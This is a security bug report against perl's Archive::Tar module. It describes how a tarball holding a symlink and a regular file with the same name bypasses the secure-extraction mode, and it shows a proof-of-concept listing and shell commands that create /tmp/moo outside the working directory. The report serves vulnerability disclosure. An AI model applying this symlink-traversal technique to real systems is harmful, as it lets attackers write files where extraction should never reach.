Source: perl Version: 5.26.2-5 Tags: securityBy default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
